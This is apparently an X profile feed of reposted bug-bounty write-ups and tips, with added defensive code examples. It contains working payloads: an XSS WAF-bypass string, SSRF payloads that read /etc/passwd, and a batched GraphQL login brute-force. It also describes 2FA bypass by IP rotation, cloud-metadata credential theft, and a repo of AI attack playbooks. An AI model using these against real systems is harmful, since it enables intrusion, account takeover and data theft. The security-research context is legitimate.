lazyhackerbd
118 posts

lazyhackerbd @lazyhackerbdX
Bug Hunter | Security Researcher
dhaka bangladesh · Joined November 2023
734 Following · 62 Followers
lazyhackerbd reposted
Gabriel Odusanya @gabbytech01
Authentication Bypass via SQL Injection (Login Endpoint)

Summary
During a security assessment of the Vulnerable Bank application @Vulnbank, an authentication bypass was identified in the login functionality. The issue allows an attacker to successfully log in as a privileged user without valid credentials due to improper handling of user input at the backend.

What Happened
The application’s login endpoint accepts user-supplied input for authentication but fails to properly validate or sanitize it before processing. As a result, crafted input is interpreted directly by the backend query logic. This led to a situation where:
The application returned a successful login response.
A valid session token was issued.
The user interface reflected authenticated admin access.
Sensitive account details (e.g., balance, account number) became accessible.

Evidence (Login Response & Dashboard Access)

Why This Is a Problem
This vulnerability breaks a core security control: authentication. If exploited in a real-world environment, it could allow an attacker to:
Impersonate other users (including admins)
Access or manipulate financial data
Initiate unauthorized transactions
Fully compromise trust in the platform
From a risk perspective, this is a high-impact issue because it affects confidentiality, integrity, and accountability simultaneously.

Root Cause
The issue stems from:
Improper input handling at the authentication layer.
Dynamic query construction without safe parameterization.
Lack of defensive controls such as strict validation and prepared statements.
In short: user input was trusted when it should never be.

How This Should Be Fixed
To remediate this issue, the application should implement the following controls:
Use parameterized queries / prepared statements
Enforce strict server-side input validation
Avoid exposing verbose authentication responses
Implement secure error handling
Add rate limiting and monitoring on authentication endpoints
Perform regular code reviews and security testing

Key Takeaway
Authentication vulnerabilities are not “basic bugs”; they are business-critical failures. This issue reinforces a fundamental lesson in security engineering: If authentication fails, everything else fails with it. Secure design at the input and query level is non-negotiable, especially in financial applications.
#Pentest #Sqlinjection
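The root cause and fix described in the post above, shown side by side as an added example (not code from the post or from the Vulnerable Bank application; the table, users and crafted input are constructed): the dynamic query lets a quote in the username rewrite the WHERE clause, while the prepared statement compares the same input only as data.

```python
import sqlite3
from typing import Optional, Tuple


def seed_users() -> sqlite3.Connection:
    # Constructed in-memory stand-in for a users table (not the application's real schema).
    # A real service stores a password hash and compares it in application code;
    # plaintext keeps the demonstration of the query shape short.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!admin", "admin"), ("alice", "alice-pass", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    # Dynamic query construction: the submitted values become part of the SQL text,
    # so a quote in the username changes the shape of the WHERE clause.
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    # Prepared statement: the query shape is fixed and the driver binds the values,
    # so the same input can only ever be compared as data, never parsed as SQL.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = seed_users()
    crafted = "admin' --"  # constructed input: the trailing comment removes the password check
    print("vulnerable:", login_vulnerable(db, crafted, "anything"))  # ('admin', 'admin')
    print("fixed:     ", login_fixed(db, crafted, "anything"))       # None
```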
lazyhackerbd reposted
Yusuf @0RedX_
Had breakfast yet? Here, have a treat: medium.com/@0RedX_/mass-assignment-json-validation-bypass-from-zero-access-to-full-admin-takeover-fc478e5a94be
lazyhackerbd reposted
Bug bounty wizard @bugbountywizard
IDOR via Base64 Encoded ID Allows Unauthorized Deletion of Other Users' Spaces by Omer Mohmed medium.com/@o.mohmed.ascii/idor-via-base64-encoded-id-allows-unauthorized-deletion-of-other-users-spaces-291be45925b0 #bugbounty #bugbountytips #bugbountytip
lazyhackerbd reposted
R1s @R1s666
Just got a reward for a vulnerability submitted on @yeswehack -- Cross-site Scripting (XSS) - Reflected (CWE-79). Waf bypass: <mctx%2FOnCoNtEnTvIsIbIlItYaUtOsTaTeChAnGe%3Dalert%601%61%09STYLE%3Ddisplay%3Ablock%3Bcontent-visibility%3Aauto>
lazyhackerbd reposted
bugcrowd @Bugcrowd
When testing a GraphQL target, verifying array batching is one of the first checks. ☑️ Here’s a quick process:
➡️ Intercept a single query.
{"query": "{ user { id } }"}
➡️ Wrap the JSON object in an array and duplicate the query.
[{"query": "{ user { id } }"}, {"query": "{ user { id } }"}]
➡️ If the server returns a JSON array of responses:
[{"data":...}, {"data":...}]
Batch execution is supported. Now, target high-value mutations like login, submit2FA, passwordReset, or query heavy nested objects to cause an application-level Denial of Service (DoS).
Here’s how you format the brute-force payload for a login mutation. You can easily script this to generate a massive array of credentials:
[
  {"query": "mutation { login(username: \"admin\", password: \"admin123\") { token } }"},
  {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},
  {"query": "mutation { login(username: \"admin\", password: \"qwerty\") { token } }"}
]
Hack GraphQL and catch some P1s. 😎
lazyhackerbd reposted
Suresh Aydi (xploiterr)
Organization Takeover via IDOR ($3,700) medium.com/@xploiterr/from-org-switcher-to-org-takeover-an-idor-story-e8f8a5652cb9 #BugBounty
lazyhackerbd reposted
Nicolas Krassas @Dinosn
Practical SRC / Crowdsourcing / Bug Bounty Vulnerability Discovery: Claude's Code Skills — 19 attack playbooks, 305 structured payloads, 263 WAF/EDR bypasses, 2887 HackerOne real-world cases, and 88,636 WooYun case statistics. github.com/MyuriKanao/src…
lazyhackerbd reposted
bugcrowd @Bugcrowd
Hacking tip 😎 Don't assume that something is secure just because the feature exists. We saw a bug recently where an application had custom auth. The user entered their password, if it was correct they had to enter a 6 digit code that was sent to their email address. The endpoint had throttling enabled. Most hackers would stop there. This one didn't! They worked out that the password step could be skipped completely, and then they worked out that the throttling on the 2FA endpoint was throttled by IP. They found a full ATO on any account by rotating their IP address on every request and simply brute forcing the 6 digit code. If you're a hacker, don't assume anything!
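The two controls whose absence the post above describes, as an added example (constructed code, not from Bugcrowd or the application in the story; class and method names are assumptions): the code step is unreachable until the password step has completed, the attempt counter is keyed by account rather than by client IP so rotating addresses does not reset it, and the set of source IPs seen per account is kept as a monitoring signal.

```python
import hmac
from collections import defaultdict
from typing import Dict, Set

MAX_CODE_ATTEMPTS = 5  # per account and pending challenge, regardless of source IP


class TwoFactorGate:
    """Constructed example: password step gates the code step; throttling is per account."""

    def __init__(self) -> None:
        self.pending_codes: Dict[str, str] = {}        # account -> expected 6-digit code
        self.password_passed: Set[str] = set()         # accounts that completed step 1
        self.attempts: Dict[str, int] = defaultdict(int)
        self.locked: Set[str] = set()
        self.seen_ips: Dict[str, Set[str]] = defaultdict(set)  # monitoring only

    def password_step(self, account: str, supplied: str, expected: str, code: str) -> bool:
        # Step 1. A real service compares a password hash; plaintext keeps the demo short.
        if not hmac.compare_digest(supplied, expected):
            return False
        self.password_passed.add(account)
        self.pending_codes[account] = code
        return True

    def code_step(self, account: str, code: str, source_ip: str) -> str:
        # Step 2 cannot be reached on its own: no completed password step, no challenge.
        if account not in self.password_passed:
            return "denied: password step not completed"
        if account in self.locked:
            return "denied: account locked"
        # The counter is keyed by account only, so rotating source_ip does not reset it.
        self.attempts[account] += 1
        self.seen_ips[account].add(source_ip)
        if self.attempts[account] > MAX_CODE_ATTEMPTS:
            self.locked.add(account)
            return "denied: account locked"
        if hmac.compare_digest(code, self.pending_codes[account]):
            self.password_passed.discard(account)
            del self.pending_codes[account]
            return "ok"
        return "denied: wrong code"

    def distinct_ips(self, account: str) -> int:
        # Detection signal: many source IPs against one account's code step in a short
        # window is the IP-rotation pattern described in the post.
        return len(self.seen_ips[account])
```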
lazyhackerbd reposted
bugcrowd @Bugcrowd
Quick bug bounty TIPS!
➡️ verified=false → true, “true”, "True", "TRUE", 1, "1", “yes”
➡️ /v3/users/1234 → v1, v0, internal, beta, legacy
➡️ quantity=100 → -1, 0, 9999999999, 1.82376931348623157e+308
➡️ role=”user” → “admin”, “”, null, “system”
➡️ /admin → /Admin, /ADMIN, /aDmIn
Try them now! ✅ Do you have something to add? 👇
lazyhackerbd reposted
BRute Logic @BRuteLogic
SSRF Payloads for LFR/LFD
file:/etc//passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
SSRF POLYGLOT
file:///etc/./passwd?/../passwd
#CF403 rodoassis.medium.com/on-ssrf-server…
lazyhackerbd reposted
P.M @p_misirov
Riley is in the top performing LSRs in the space and I bet you don’t even know about him. he’s the 1% of the 1%. pure unadulterated talent. be like Riley.
Cantina 🪐 @cantinasecurity

$500,000 to @rileyholterhus through Cantina Bounties. 🪐 The researchers who consistently find the bugs that matter don't chase volume. They follow programs where scope is tight, triage is fast, and rewards match actual impact. Well done, Riley!

lazyhackerbd reposted
Derson @dersonxyz
Using @hakiraio AI, I was able to earn $15,000 from multiple bug bounty programs. If you want to save time and discover real vulnerabilities in smart contracts and web applications, this tool is built for you.
lazyhackerbd reposted
Cantina 🪐 @cantinasecurity
$500,000 to @rileyholterhus through Cantina Bounties. 🪐 The researchers who consistently find the bugs that matter don't chase volume. They follow programs where scope is tight, triage is fast, and rewards match actual impact. Well done, Riley!
lazyhackerbd reposted
Be5Lmt @Be5Lmt
No quotes. No spaces. No Parentheses. No Semicolons. Still SQLi.... Collab with @or4nge16hehe medium.com/@r9.mody/sql-injection-in-numeric-parameter-int-without-common-special-characters-ae31e15ea3e3?postPublishedType=repub #bugbounty
Be5Lmt @Be5Lmt

SQL Injection without these special chars [' "()\/%*&\`] possible? Yep, me and @or4nge16hehe did it. Using only: [ a-z, 0-9, dot, @+- ] Write-up soon #BugBounty #infosec

lazyhackerbd reposted
Divyansh Sharma @divyansh2401
Yay, I was awarded a total of $5,500 in bounties on @Hacker0x01! hackerone.com/eliteoffensive

Vulnerabilities Found:

1. Privilege Escalation (Trial User → Platform Admin)
   1. While reading the site's JavaScript files, I found an API endpoint and noticed it accepted an "author" parameter in the request body.
   2. The JS hinted that the "author" value was used to identify who the request belonged to — and that this value needed to be an admin's email for certain actions.
   3. I collected 15–20 employee emails through public sources (OSINT).
   4. I tested them one by one as the "author" value. One matched a platform admin account, and that request was accepted.
   5. Using that admin's email as "author" along with my own account ID, I changed my account "plan" from "trial" to "internal". The request went through, and my role was updated.
   6. Root cause: the endpoint was authorizing the request using a value from the request body instead of the role from the user's authenticated session.

2. SSRF → Cloud Metadata Credential Exposure
   1. The app had a feature that fetched user-supplied URLs from the server side.
   2. Confirmed by pointing it at a public echo service — the response showed a cloud server IP, not mine. The server was making the request.
   3. The URL filter blocked the metadata service IP in its standard dotted form, but didn't normalize alternate representations. Converting the same IP to its decimal form bypassed the filter cleanly.
   4. From there, the standard two-step metadata flow worked: first request returned a session token, second request used that token to return temporary instance role credentials.
   5. Root cause: block-list URL filtering without IP normalization. A single canonicalization step on the resolved address would have caught this.

3. IDOR Exposing 285,000+ Customer Invoices
   The invoice download endpoint used sequential IDs with no ownership check. Changing the ID returned other customers' invoices.

4. IDOR Enabling Cross-Tenant Audit Log Manipulation
   A "log move" endpoint trusted client-supplied IDs, which allowed moving log entries across tenant boundaries and tampering with audit history.

5. Unauthenticated Path Traversal
   A public endpoint accepted file paths without sanitization, allowing partial file reads across the platform with no authentication required.

Key lessons:
→ Never authorize based on request-body fields. Use the session/JWT role.
→ URL-fetch features need allow-lists, and must normalize alternate IP forms.
→ Sequential IDs are fine; missing ownership checks are not.
→ "Unauthenticated" doesn't mean "untrusted input is safe."

#bugbounty #securityresearcher #ethicalhacker #cybersecurity #vulnerability #penetrationtesting #securityaudit #digitalsecurity #tech #innovation #hackerone #freelance #freelancer #pentester #ssrf #idor #privilegeescalation #pathtraversal #appsec #infosec #TogetherWeHitHarder #bugbountytips
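The canonicalization step the SSRF finding above says was missing, as an added example (constructed code, not from the post or the affected platform; the allow-list entry and function names are assumptions). It goes a little beyond the decimal case in the post: every spelling inet_aton accepts (decimal, 0x hex, leading-zero octal, and 1-to-4 dotted parts) is collapsed to one IPv4Address before the block-list decision, and only names on an allow-list are fetched without a literal-address check.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

# Assumed policy: only these hostnames may be fetched by name (constructed value).
ALLOWED_HOSTNAMES = {"api.partner.example"}


def _part_value(part: str) -> Optional[int]:
    # One dotted component as inet_aton reads it: 0x hex, leading-0 octal, else decimal.
    if part[:2].lower() == "0x":
        digits, base = part[2:], 16
    elif len(part) > 1 and part[0] == "0":
        digits, base = part[1:], 8
    else:
        digits, base = part, 10
    digits = digits.lower()
    if not digits or any(c not in "0123456789abcdef"[:base] for c in digits):
        return None
    return int(digits, base)


def canonical_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Collapse every inet_aton spelling of an address to a single IPv4Address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_value(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    # Leading parts are single bytes; the last part fills all remaining bytes.
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << (8 * (4 - len(lead)))) | last)


def is_fetch_allowed(url: str) -> bool:
    """Allow-list by name; any literal address must be globally routable after
    canonicalization (link-local, loopback and private ranges are all refused)."""
    host = urlsplit(url).hostname or ""
    if host in ALLOWED_HOSTNAMES:
        return True  # the resolved address still needs re-checking at connect time (rebinding)
    ip = canonical_ipv4(host)
    if ip is None:
        return False  # unknown name or unparsable host: refuse rather than guess
    return ip.is_global
```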